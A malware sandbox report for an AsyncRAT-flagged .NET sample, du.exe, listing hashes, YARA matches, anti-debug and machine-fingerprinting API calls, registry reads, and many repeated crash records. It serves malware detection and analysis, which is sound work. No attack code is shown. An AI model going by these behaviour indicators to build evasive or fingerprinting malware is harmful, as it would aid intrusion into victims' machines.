Summary | ZeroBOX

du.exe

Glupteba Ficker Stealer AsyncRAT
Category Machine Started Completed
FILE s1_win7_x6401 April 5, 2021, 1:26 p.m. April 5, 2021, 1:29 p.m.
Size 8.0KB
Type PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5 176a67399e1fd4d5fc92643e70fdee7f
SHA256 f510d87c6a0ac9c5d995ec2d878d130fb6d3442063b604be14f65af69ae9f5af
CRC32 24261B5B
ssdeep 96:lohr2dGlu+hqquOQh4Sl3HIlVLxBZgFOx5v38+D4q4HIZtBfRkQ1GYDBRWBzNt:lQNhj5I4KWnx5vMK4oZtBfR1GYDnWD
PDB Path C:\Users\Test\source\repos\Payload Builder\Dynamic Payload\obj\Debug\Dynamic Payload.pdb
Yara
  • Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT
  • PE_Header_Zero - PE File Signature Zero
  • IsPE32 - (no description)
  • IsNET_EXE - (no description)
  • IsWindowsGUI - (no description)
  • HasDebugData - DebugData Check

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path C:\Users\Test\source\repos\Payload Builder\Dynamic Payload\obj\Debug\Dynamic Payload.pdb
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 2654435769
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
exception.exception_code: 0xc0000005
exception.offset: 425151
exception.address: 0x77407cbf
registers.esp: 1635676
registers.edi: 3014656
registers.eax: 4294967288
registers.ebp: 1635728
registers.edx: 6
registers.ebx: 0
registers.esi: 0
registers.ecx: 2612
1 0 0

__exception__

stacktrace:
LocalSize+0xe4 BasepMapModuleHandle-0x31 kernel32+0x2e825 @ 0x7574e825
saskafunma1eoidkrmoxdxlm+0x154a0 @ 0x4154a0

exception.instruction_r: 80 78 07 05 0f 84 27 56 02 00 f6 40 07 3f 0f 84
exception.symbol: RtlGetUserInfoHeap+0x4e RtlQueueWorkItem-0x3e7 ntdll+0x67cbf
exception.instruction: cmp byte ptr [eax + 7], 5
exception.module: ntdll.dll
